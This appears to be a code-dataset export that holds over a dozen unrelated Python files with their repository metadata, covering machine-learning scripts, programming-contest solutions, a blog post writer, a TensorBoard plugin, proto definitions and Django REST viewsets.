# ---- GPU / TF session setup ----
from keras import backend as K
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
if('tensorflow' == K.backend()):
    import tensorflow as tf
    from keras.backend.tensorflow_backend import set_session
    config = tf.ConfigProto()
    # Grow GPU memory on demand instead of reserving it all up front.
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)

# ---- Load CIFAR-10 and preprocess (mean subtraction only) ----
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train, x_test = color_preprocessing(x_train, x_test)

# ---- Load the trained DenseNet and sanity-check its test accuracy ----
model1 = load_model('densenet.h5')
print(model1.evaluate(x_test, y_test))
#print(model1.summary())
#input('check...')
#for layer in model1.layers:
#for index in range(layer.output_shape[-1]):
# print(layer.name)
# print(layer.output_shape)
#print(layer.name)
#print(layer.output_shape)
#print(layer.output_shape[-1])
#print('----------')
# Coverage bookkeeping (initialised but not updated below).
model_layer_dict1 = defaultdict(bool)
init_dict(model1,model_layer_dict1)
#print(model_layer_dict1)
#print(len(model_layer_dict1.keys()))
#test_image = x_test[0].reshape([1,32,32,3])
#test_image.shape
#res = model.predict(test_image)
#label = softmax_to_label(res)
#print(label)
#print(x_test[0])
#print(len(x_test[0]))
#print(len(x_test[0][0]))
from keras.models import Model
#threshold = float(0.5)
layer_names = [layer.name for layer in model1.layers if 'flatten' not in layer.name and 'input' not in layer.name]
#print(layer_names)
#input('check...')
#intermediate_layer_model = Model(inputs=model1.input,outputs=[model1.get_layer(layer_name).output for layer_name in layer_names])
# Tap only the penultimate layer's activations for every test image.
intermediate_layer_model = Model(inputs=model1.input, outputs = [model1.get_layer(layer_names[-2]).output])
from tqdm import tqdm
cov = []
flag = 0
neuronlist = []
# One activation vector per line.  NOTE(review): the file is only closed on
# normal completion -- a with-block would be safer if this is interrupted.
f = open('Cov/cross_entropy','w')
for g in tqdm(range(len(x_test))):
    test_image = x_test[g].reshape([1,32,32,3])
    intermediate_layer_outputs = intermediate_layer_model.predict(test_image)
    #print(type(intermediate_layer_outputs[0]))
    #print(intermediate_layer_outputs[0])
    output = intermediate_layer_outputs[0].tolist()
    #print(output)
    #print(intermediate_layer_output[0])
    #print(len(intermediate_layer_output[0]))
    #input('pause...')
    f.write(str(output) + '\n')
f.close()
|
[
"DLR_ICLR20@163.com"
] |
DLR_ICLR20@163.com
|
1e9c16e2b6d642eebb25c59fd0d5220331672fb8
|
324d8a723bc057b4679014a1a7df08a013f2e237
|
/torchpack/runner/hooks/logger.py
|
49251f01012a787560503cb09c3bb34fd5925422
|
[
"MIT"
] |
permissive
|
lxx1991/torchpack
|
ff0db24c73479b8d4e1bf77dd5fda4e5a3a7b694
|
3de04972bca89e0a4c53fa896a4f9f62457adc75
|
refs/heads/master
| 2020-03-24T04:05:14.299613
| 2018-07-26T13:52:38
| 2018-07-26T13:52:38
| 142,443,539
| 0
| 0
| null | 2018-07-26T13:17:29
| 2018-07-26T13:17:29
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from .hook import Hook
class LoggerHook(Hook):
    """Base class for logger hooks.

    Logs every ``interval`` inner iterations, optionally resetting the
    runner's meter afterwards; the trailing partial interval at the end of
    an epoch is logged unless ``ignore_last`` is set.
    """

    def __init__(self, interval=10, reset_meter=True, ignore_last=True):
        self.interval = interval
        self.reset_meter = reset_meter
        self.ignore_last = ignore_last

    def log(self, runner):
        # Subclasses implement the actual output.
        pass

    def log_and_reset(self, runner):
        self.log(runner)
        if self.reset_meter:
            runner.meter.reset()

    def after_train_iter(self, runner):
        if not self.every_n_inner_iters(runner, self.interval):
            # Off-interval: only the end-of-epoch remainder may be logged.
            if not self.end_of_epoch(runner):
                return
            if self.ignore_last:
                return
        self.log_and_reset(runner)

    def after_val_epoch(self, runner):
        self.log_and_reset(runner)
|
[
"chenkaidev@gmail.com"
] |
chenkaidev@gmail.com
|
2e5b6109e5a9caf2bc44433828a311f4a7bdbc4b
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5686313294495744_0/Python/jessethegame/technobabble.py
|
4dc584f7ee2f0b34adfcd5dd99e118b303b19b94
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
from collections import Counter
file = 'C-small-attempt0.in'
def technobabble(topics):
    """Count fake topics: repeatedly accept the lowest-scored topic's words
    as real, then discard topics whose both words are already real."""
    seen_firsts = set()
    seen_seconds = set()
    fake_count = 0
    while topics:
        first_words, second_words = zip(*topics)
        first_freq = Counter(first_words)
        second_freq = Counter(second_words)
        # Score each topic by word popularity; take the lowest (ties break
        # lexicographically, exactly as the original sorted()[0] did).
        scored = sorted((first_freq[a] + second_freq[b], a, b)
                        for a, b in topics)
        _, top_first, top_second = scored[0]
        seen_firsts.add(top_first)
        seen_seconds.add(top_second)
        before = len(topics) - 1
        topics = [(a, b) for a, b in topics
                  if a not in seen_firsts or b not in seen_seconds]
        fake_count += before - len(topics)
    return fake_count
# Driver: read T cases; each case has N two-word topics, one per line.
# (Python 2 print statement below.)
with open(file) as handle:
    T = int(handle.readline())
    for t in range(T):
        N = int(handle.readline())
        topics = []
        for n in range(N):
            topics.append(handle.readline().strip().split())
        print "Case #{}: {}".format(t + 1, technobabble(topics))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
c239e77199b80a12345eece29962351d9e9c9e3a
|
aa4024b6a846d2f6032a9b79a89d2e29b67d0e49
|
/mbeddr2C_MM/transformation_from_eclipse/Hlayer0rule10.py
|
bb1691eeceb274bc2e91c97bcfad803a7582cfba
|
[
"MIT"
] |
permissive
|
levilucio/SyVOLT
|
41311743d23fdb0b569300df464709c4954b8300
|
0f88827a653f2e9d3bb7b839a5253e74d48379dc
|
refs/heads/master
| 2023-08-11T22:14:01.998341
| 2023-07-21T13:33:36
| 2023-07-21T13:33:36
| 36,246,850
| 3
| 2
|
MIT
| 2023-07-21T13:33:39
| 2015-05-25T18:15:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
from core.himesis import Himesis
import uuid
class Hlayer0rule10(Himesis):
    # NOTE(review): this class looks machine-generated from a DSLTrans rule;
    # prefer regenerating over hand-editing.
    def __init__(self):
        """
        Creates the himesis graph representing the DSLTrans rule layer0rule10.
        """
        # Flag this instance as compiled now
        self.is_compiled = True

        super(Hlayer0rule10, self).__init__(name='Hlayer0rule10', num_nodes=0, edges=[])

        # Set the graph attributes
        self["mm__"] = ['HimesisMM']
        self["name"] = """layer0rule10"""
        self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'layer0rule10')

        # match model. We only support one match model
        self.add_node()
        self.vs[0]["mm__"] = """MatchModel"""
        # apply model node
        self.add_node()
        self.vs[1]["mm__"] = """ApplyModel"""
        # paired with relation between match and apply models
        self.add_node()
        self.vs[2]["mm__"] = """paired_with"""
        # match class RequiredPort(layer0rule10class0) node
        self.add_node()
        self.vs[3]["mm__"] = """RequiredPort"""
        self.vs[3]["attr1"] = """+"""
        # match_contains node for class RequiredPort(layer0rule10class0)
        self.add_node()
        self.vs[4]["mm__"] = """match_contains"""
        # apply class Member(layer0rule10class1) node
        self.add_node()
        self.vs[5]["mm__"] = """Member"""
        self.vs[5]["attr1"] = """1"""
        # apply_contains node for class Member(layer0rule10class1)
        self.add_node()
        self.vs[6]["mm__"] = """apply_contains"""

        # Add the edges
        self.add_edges([
            (0,4),  # matchmodel -> match_contains
            (4,3),  # match_contains -> match_class RequiredPort(layer0rule10class0)
            (1,6),  # applymodel -> apply_contains
            (6,5),  # apply_contains -> apply_class Member(layer0rule10class1)
            (0,2),  # matchmodel -> pairedwith
            (2,1)   # pairedwith -> applyModel
        ])

        # Add the attribute equations
        self["equations"] = [((5,'name'),('concat',((3,'name'),('constant','__ops')))), ((5,'__ApplyAttribute'),('constant','RequiredPort_ops')), ]
|
[
"bentleyjoakes@gmail.com"
] |
bentleyjoakes@gmail.com
|
a865a4a19651e7b15a5546c69a0a6e8fd29a34e7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/1242.py
|
fb480c086828b23e6c6b68107084423f36d2c390
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
inputfile = open("h2.in", mode='r')
outputfile = open("output_h_l.txt", mode='w')
t = int(inputfile.readline().strip())
for case in range(t):
d, n = map(int, inputfile.readline().strip().split(' '))
time = 0
for i in range(n):
hD, hS = map(int, inputfile.readline().strip().split(' '))
hT = (d - hD) / hS
if hT > time:
time = hT
speed = d / time
outputfile.write("case #" + str(case + 1) + ": " + str(speed)+"\n")
print("case #" + str(case + 1) + ": " + str(speed))
outputfile.close()
inputfile.close()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
01956a1d6ef57c28be46ff7304cfc60c0c562d05
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_7/ndxren013/util.py
|
f7c3c9c8c6cfa0051e619ed357a02dcd81f8c0e5
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339
| 2014-09-22T02:22:22
| 2014-09-22T02:22:22
| 22,372,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
import copy
def create_grid(grid):
    """Fill *grid* in place with a fresh 4x4 matrix of zeros."""
    for _ in range(4):
        grid.append([0] * 4)
def print_grid(grid):
    """Print the 4x4 grid in 5-wide columns inside an ASCII box.

    Zero cells are rendered as blanks.
    """
    border = "+--------------------+"
    print(border)
    for row in grid:
        cells = ""
        for value in row:
            text = "" if value == 0 else str(value)
            cells += text.ljust(5)
        print("|" + cells + "|")
    print(border)
def check_lost(grid):
    """Return True if no move is possible: no zero cell and no pair of
    equal horizontally- or vertically-adjacent values."""
    # Any empty cell means a tile can still be placed.
    if any(grid[r][c] == 0 for r in range(4) for c in range(4)):
        return False
    # Any equal neighbour (right or down covers every adjacent pair).
    for r in range(4):
        for c in range(4):
            if c < 3 and grid[r][c] == grid[r][c + 1]:
                return False
            if r < 3 and grid[r][c] == grid[r + 1][c]:
                return False
    return True
def check_won(grid):
    """Return True if a value >= 32 is found anywhere in the 4x4 grid."""
    return any(grid[r][c] >= 32 for r in range(4) for c in range(4))
def copy_grid(grid):
    """Return a fully independent copy of the grid."""
    duplicate = copy.deepcopy(grid)
    return duplicate
def grid_equal(grid1, grid2):
    """Check if 2 grids are equal - return boolean value."""
    # The comparison already yields a bool; the previous if/else was redundant.
    return grid1 == grid2
|
[
"jarr2000@gmail.com"
] |
jarr2000@gmail.com
|
71f69800aac7f2532c02268c353747e0fb1e2a77
|
ee2444e8e70f136e6b34a35eb55dc287a7621956
|
/clock/clocks.py
|
20fd7688ffe7775b14b7fed30fc4decad5af4c9f
|
[
"Apache-2.0"
] |
permissive
|
vyahello/desktop-clock
|
ec737c6e12273bc9f309e4dc921740b41e5fbef0
|
b9db67ef646db7951354842846e8b6baf03d3076
|
refs/heads/master
| 2020-04-14T03:12:13.643967
| 2019-01-06T22:10:00
| 2019-01-06T22:10:00
| 163,602,100
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from abc import ABC, abstractmethod
from clock.environment.engines import Engine, ClockEngine
from clock.environment.time import Time, ClockTime
from clock.environment.widgets import Widget, PurpleUIWidget
from clock.environment.windows import Window
from clock.types import Runner
class Clock(ABC):
    """Abstract interface for a clock that can be started and stopped."""

    @abstractmethod
    def start(self) -> None:
        """Start running a clock."""

    @abstractmethod
    def stop(self) -> None:
        """Stop running a clock."""
class DigitalClock(Clock):
    """Unified digital clock wiring a time source, window and widget together."""

    def __init__(self, name: str, time: Time, master: Window, widget: Widget) -> None:
        self._name = name
        self._widget = widget
        self._master = master
        # The engine drives periodic widget updates from the time source.
        self._engine: Engine = ClockEngine(time, widget)

    def start(self) -> None:
        """Title the window, kick off the engine, then enter the UI loop."""
        self._master.set_title(self._name)
        self._engine.run()
        self._master.start_loop()

    def stop(self) -> None:
        """Exit the UI loop."""
        self._master.stop_loop()
class PurpleDigitalClock(Clock):
    """Concrete digital clock skinned with the purple UI widget."""

    def __init__(self, master: Window, name: str) -> None:
        purple_widget = PurpleUIWidget(master)
        # Compose rather than inherit: delegate everything to a DigitalClock.
        self._clock: Clock = DigitalClock(name=name,
                                          time=ClockTime(),
                                          master=master,
                                          widget=purple_widget)

    def start(self) -> None:
        self._clock.start()

    def stop(self) -> None:
        self._clock.stop()
class ClockRunner(Runner):
    """Main clock runner: starts its clock when performed."""

    def __init__(self, clock: Clock) -> None:
        self._clock: Clock = clock

    def perform(self):
        """Start the clock functioning."""
        return self._clock.start()
|
[
"vyahello@gmail.com"
] |
vyahello@gmail.com
|
9889d3e62066d82b07468267398eeaee10b1399b
|
bd75c7ec55b78ef189f57596520744f82ec73073
|
/Swap Nodes in Pairs.py
|
06df07c8a141d9b99481b27baa91b0459c330f30
|
[] |
no_license
|
GaoLF/LeetCode-PY
|
17058ac0743403292559f9b83a20bf79d89e33f6
|
ccd294cfe0c228a21518d077d1aa01e510930ea3
|
refs/heads/master
| 2021-01-23T02:24:05.940132
| 2015-07-22T13:44:01
| 2015-07-22T13:44:01
| 38,248,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
# Definition for singly-linked list.
class ListNode:
    """Singly-linked list node holding a value and a next pointer."""

    def __init__(self, x):
        self.val = x
        self.next = None
class Solution:
    # @param {ListNode} head
    # @return {ListNode}
    def swapPairs(self, head):
        """Swap every pair of adjacent nodes in place and return the new head.

        Odd-length lists keep their final node in place; empty and
        single-node lists are returned unchanged.
        """
        if not head or not head.next:
            return head
        new_head = head.next
        prev = None
        node = head
        while node and node.next:
            second = node.next
            after = second.next
            # Reverse the pair and splice it back into the chain.
            second.next = node
            node.next = after
            if prev is not None:
                prev.next = second
            prev = node
            node = after
        return new_head
# Ad-hoc manual test: build a list and print the swapped order.
# NOTE(review): with `a.next = b` commented out, the list starting at `a`
# contains only [1]; the real chain starts at `b`.  (Python 2 print below.)
A = Solution()
a = ListNode(1)
b = ListNode(2)
c = ListNode(3)
d = ListNode(4)
e = ListNode(5)
f = ListNode(6)
#a.next = b
b.next = c
c.next = d
d.next = e
e.next = f
x = A.swapPairs(a)
while x:
    print x.val
    x = x.next
|
[
"gaolongfei@pku.edu.cn"
] |
gaolongfei@pku.edu.cn
|
16ae4e8715304dfc152331ccbd298ad4158b5b5b
|
113d34bc3a8a9d43c770fd41ee327fd3cbca67dd
|
/Python3/Path in the matrix.py
|
24465fdc0b35da89dd603edf323da1f75d640c77
|
[] |
no_license
|
liuyuhang791034063/LeetCode
|
2b5d3413abc3ed6f8fccf35f39454e2cfd9807b1
|
b613718bf69982535b7c3c9f329a47d5741d8a9e
|
refs/heads/master
| 2020-03-29T01:58:25.836162
| 2019-07-27T04:33:06
| 2019-07-27T04:33:06
| 149,415,780
| 12
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,553
|
py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: Path in the matrix
Description:
Author: God
date: 2018/12/3
-------------------------------------------------
Change Activity: 2018/12/3
-------------------------------------------------
"""
__author__ = 'God'
class Solution:
    def hasPath(self, matrix, rows, cols, path):
        """Return True if *path* can be traced through *matrix* (a flat
        string laid out row-major as rows x cols) without revisiting cells."""
        self.col, self.row = cols, rows
        grid = [list(matrix[cols * r: cols * r + cols]) for r in range(rows)]
        for r in range(rows):
            for c in range(cols):
                if grid[r][c] != path[0]:
                    continue
                self.b = False
                self.search(grid, path[1:], [(r, c)], r, c)
                if self.b:
                    return True
        return False

    def search(self, matrix, word, exists, i, j):
        """DFS from (i, j) for the remaining *word*; sets self.b on success."""
        if word == '':
            self.b = True
            return
        # Explore left, up, right, down (same order as the original).
        for di, dj in ((0, -1), (-1, 0), (0, 1), (1, 0)):
            ni, nj = i + di, j + dj
            if (0 <= ni < self.row and 0 <= nj < self.col
                    and (ni, nj) not in exists and matrix[ni][nj] == word[0]):
                self.search(matrix, word[1:], exists + [(ni, nj)], ni, nj)
|
[
"liuyuhang791034063@qq.com"
] |
liuyuhang791034063@qq.com
|
0e602feaaebaabffc917cb62b6c5e9a85335fffa
|
f312fcd24d94be8b32e2d1e50643b01c619aa23b
|
/tensorboard/plugins/wit_redirect/wit_redirect_plugin.py
|
58bcd4d9cfb12ad96adb029933e9ef31ab6a7ad5
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/tensorboard
|
bf316fc5d47f78ef980dd2106c99207892a508d5
|
5961c76dca0fb9bb40d146f5ce13834ac29d8ddb
|
refs/heads/master
| 2023-09-03T23:59:03.264261
| 2023-08-30T22:24:07
| 2023-08-30T22:24:07
| 91,379,993
| 6,766
| 2,063
|
Apache-2.0
| 2023-09-14T20:55:56
| 2017-05-15T20:08:07
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 1,682
|
py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Plugin that only displays a message with installation instructions."""
from tensorboard.plugins import base_plugin
class WITRedirectPluginLoader(base_plugin.TBLoader):
    """Load the redirect notice iff the dynamic plugin is unavailable."""

    def load(self, context):
        """Return the redirect plugin, or None when the real WIT is installed."""
        try:
            import tensorboard_plugin_wit  # noqa: F401
        except ImportError:
            # Dynamic plugin missing: surface the installation notice instead.
            return _WITRedirectPlugin(context)
        # Real plugin present; hide this redirect entirely.
        return None
class _WITRedirectPlugin(base_plugin.TBPlugin):
    """Redirect notice pointing users to the new dynamic LIT plugin."""

    plugin_name = "wit_redirect"

    def get_plugin_apps(self):
        # No backend routes: the frontend element carries the whole message.
        return dict()

    def is_active(self):
        return False

    def frontend_metadata(self):
        return base_plugin.FrontendMetadata(tab_name="What-If Tool",
                                            element_name="tf-wit-redirect-dashboard")
|
[
"noreply@github.com"
] |
tensorflow.noreply@github.com
|
13205a31e87c1b4daed148c5469c509a8f892bfa
|
ff810e6722caab8c0affcf97151f3c8fc332b6a1
|
/muddery/worlddata/dao/event_mapper.py
|
cabd7a3f72345ee671298bcbd1c1df5684fb79c3
|
[
"BSD-3-Clause"
] |
permissive
|
tuchang/muddery
|
014b69daf33a0042d341b403acc9939ca5e3ef11
|
bab4b86c5fe4259b7c22a97d54e4249aab47f99e
|
refs/heads/master
| 2020-04-26T23:38:40.383523
| 2019-01-30T14:54:07
| 2019-01-30T14:54:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
"""
Query and deal common tables.
"""
from __future__ import print_function
from evennia.utils import logger
from django.db import transaction
from django.apps import apps
from django.conf import settings
from muddery.utils import defines
from muddery.worlddata.dao.common_mapper_base import ObjectsMapper
def get_object_event(object_key):
    """
    Get object's event.

    Returns the queryset of event_data rows whose trigger is *object_key*.
    """
    event_model = apps.get_model(settings.WORLD_DATA_APP, "event_data")
    return event_model.objects.filter(trigger_obj=object_key)
|
[
"luyijun999@gmail.com"
] |
luyijun999@gmail.com
|
8a60ef7df7b4593fe623e1cd3e266dec4a72850c
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/triangle_20200625195423.py
|
f43a71703b57e579886f578c35c9e086ac7dbb53
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
# this function is meant to print a triangle
def triangle():
    """Print a 4-row right triangle of asterisks to stdout.

    Bug fix: the original printed every '*' on its own line (print() appends
    a newline), producing a single column instead of the intended triangle.
    """
    for row in range(4):
        # One more star on each successive row: *, **, ***, ****.
        print('*' * (row + 1))


triangle()
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
0efe069b4fa0143a1c876e9da6b2664df329c8ff
|
8821c29949644faab3023f492bf615fe1cab4049
|
/liquidluck/writers/extends.py
|
dc50589efe1785f5f245c316b5bf36a2d61828f3
|
[] |
no_license
|
loopwerk/liquidluck
|
c29bf2cc70343418dbe6a4dd3b55c9ec96e1f503
|
d2c41f0b7cddabd3036bab514cf5ecbcc57becea
|
refs/heads/main
| 2023-02-26T15:41:06.173164
| 2021-02-02T16:32:32
| 2021-02-02T16:32:32
| 335,299,233
| 1
| 0
| null | 2021-02-02T13:32:14
| 2021-02-02T13:32:14
| null |
UTF-8
|
Python
| false
| false
| 2,165
|
py
|
#!/usr/bin/env python
"""Extends of the core writers
"""
import os
from liquidluck.options import g, settings
from liquidluck.writers.base import BaseWriter
from liquidluck.writers.base import get_post_destination
class PostWriter(BaseWriter):
    """Replace the default post writer, edit settings::

        writers = {
            'post': 'liquidluck.writers.exends.PostWriter',
        }

    Get related posts in template with::

        - {{post.relation.newer}}
        - {{post.relation.older}}
        - {% for item in post.relation.related %}
    """
    writer_name = 'post'

    def __init__(self):
        self._template = self.get('post_template', 'post.html')

    def start(self):
        """Render every public post (with relations) and every secure post."""
        for index, post in enumerate(g.public_posts):
            template = post.template or self._template
            relation = self._get_relations(post, index)
            post.relation = relation
            self.render({'post': post}, template, self._dest_of(post))

        for post in g.secure_posts:
            # Bug fix: this loop previously reused `template` left over from
            # the public-posts loop (NameError when there were no public
            # posts, and the wrong template otherwise).
            template = post.template or self._template
            post.relation = None
            self.render({'post': post}, template, self._dest_of(post))

    def _dest_of(self, post):
        """Output path for *post* based on the configured permalink."""
        dest = get_post_destination(post, settings.config['permalink'])
        return os.path.join(g.output_directory, dest)

    def _get_relations(self, post, index):
        """Compute newer/older neighbours and up to 4 tag-related posts."""
        total = len(g.public_posts)

        newer = None
        if index > 0:
            newer = g.public_posts[index - 1]

        older = None
        if index < total - 1:
            older = g.public_posts[index + 1]

        def get_related_by_tags():
            tags = set(post.tags)
            base = len(post.tags)
            for p in g.public_posts:
                # Fewer "missing" tags => more tag overlap => higher priority.
                prior = len(tags - set(p.tags))
                if prior < base and p.title != post.title:
                    p.related_priority = base - prior
                    yield p

        related = sorted(get_related_by_tags(),
                         key=lambda o: o.related_priority,
                         reverse=True)

        relation = {
            'newer': newer,
            'older': older,
            'related': related[:4],
        }
        return relation
|
[
"lepture@me.com"
] |
lepture@me.com
|
df3dd0c6444826ae7b47594b45a3af13c9367411
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/cloud/automl/v1beta1/automl-v1beta1-py/google/cloud/automl_v1beta1/types/text.py
|
4cfbeec4414685c6289c3c27575e043c78d1d454
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,303
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.automl_v1beta1.types import classification
# Generated module manifest: registers this file's messages under the
# google.cloud.automl.v1beta1 proto package.
__protobuf__ = proto.module(
    package='google.cloud.automl.v1beta1',
    manifest={
        'TextClassificationDatasetMetadata',
        'TextClassificationModelMetadata',
        'TextExtractionDatasetMetadata',
        'TextExtractionModelMetadata',
        'TextSentimentDatasetMetadata',
        'TextSentimentModelMetadata',
    },
)
class TextClassificationDatasetMetadata(proto.Message):
    r"""Dataset metadata for classification.

    Attributes:
        classification_type (google.cloud.automl_v1beta1.types.ClassificationType):
            Required. Type of the classification problem.
    """
    # Proto field 1.
    classification_type = proto.Field(proto.ENUM, number=1,
        enum=classification.ClassificationType,
    )
class TextClassificationModelMetadata(proto.Message):
    r"""Model metadata that is specific to text classification.

    Attributes:
        classification_type (google.cloud.automl_v1beta1.types.ClassificationType):
            Output only. Classification type of the
            dataset used to train this model.
    """
    # Proto field 3.
    classification_type = proto.Field(proto.ENUM, number=3,
        enum=classification.ClassificationType,
    )
class TextExtractionDatasetMetadata(proto.Message):
r"""Dataset metadata that is specific to text extraction"""
class TextExtractionModelMetadata(proto.Message):
r"""Model metadata that is specific to text extraction.
Attributes:
model_hint (str):
Indicates the scope of model use case.
- ``default``: Use to train a general text extraction
model. Default value.
- ``health_care``: Use to train a text extraction model
that is tuned for healthcare applications.
"""
model_hint = proto.Field(proto.STRING, number=3)
class TextSentimentDatasetMetadata(proto.Message):
r"""Dataset metadata for text sentiment.
Attributes:
sentiment_max (int):
Required. A sentiment is expressed as an integer ordinal,
where higher value means a more positive sentiment. The
range of sentiments that will be used is between 0 and
sentiment_max (inclusive on both ends), and all the values
in the range must be represented in the dataset before a
model can be created. sentiment_max value must be between 1
and 10 (inclusive).
"""
sentiment_max = proto.Field(proto.INT32, number=1)
class TextSentimentModelMetadata(proto.Message):
r"""Model metadata that is specific to text sentiment."""
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
70010e56865e6859e5fb7ce76d3db89396781ae3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02404/s524653076.py
|
6b28671655af949d1e273a3f672228e10e89b441
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
while True:
num = list(map(int,input().split()))
if(num[0] == 0 and num[1] == 0): break
else:
flag = False
for i in range(num[0]):
str = ""
if(i == 0 or i == num[0]-1): flag=True
else: flag=False
for j in range(num[1]):
if(j == 0 or j == num[1]-1 or flag):
str = str + "#"
else:
str = str + "."
print(str)
print()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
217781305f8edabd2f783fbd2dfab45ad641bc8b
|
88b063ec8e543e6f62f3adac6be214128a984548
|
/backend/chat/api/v1/viewsets.py
|
f866d1b60c17b260c5991567c246fc3286766130
|
[] |
no_license
|
crowdbotics-apps/chat-app-28513
|
6939d1da6c53f6d44786b4f822b4fb4c1fedd57f
|
129f56f533f8f3076fdcfcfe3180942e5890f9f2
|
refs/heads/master
| 2023-06-06T17:26:04.090136
| 2021-07-06T23:23:40
| 2021-07-06T23:23:40
| 383,620,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,983
|
py
|
from rest_framework import authentication
from chat.models import (
Message,
ThreadMember,
MessageAction,
ThreadAction,
ForwardedMessage,
Thread,
)
from .serializers import (
MessageSerializer,
ThreadMemberSerializer,
MessageActionSerializer,
ThreadActionSerializer,
ForwardedMessageSerializer,
ThreadSerializer,
)
from rest_framework import viewsets
class ForwardedMessageViewSet(viewsets.ModelViewSet):
serializer_class = ForwardedMessageSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ForwardedMessage.objects.all()
class ThreadActionViewSet(viewsets.ModelViewSet):
serializer_class = ThreadActionSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = ThreadAction.objects.all()
class MessageActionViewSet(viewsets.ModelViewSet):
serializer_class = MessageActionSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = MessageAction.objects.all()
class ThreadViewSet(viewsets.ModelViewSet):
serializer_class = ThreadSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Thread.objects.all()
class MessageViewSet(viewsets.ModelViewSet):
serializer_class = MessageSerializer
authentication_classes = (
authentication.SessionAuthentication,
authentication.TokenAuthentication,
)
queryset = Message.objects.all()
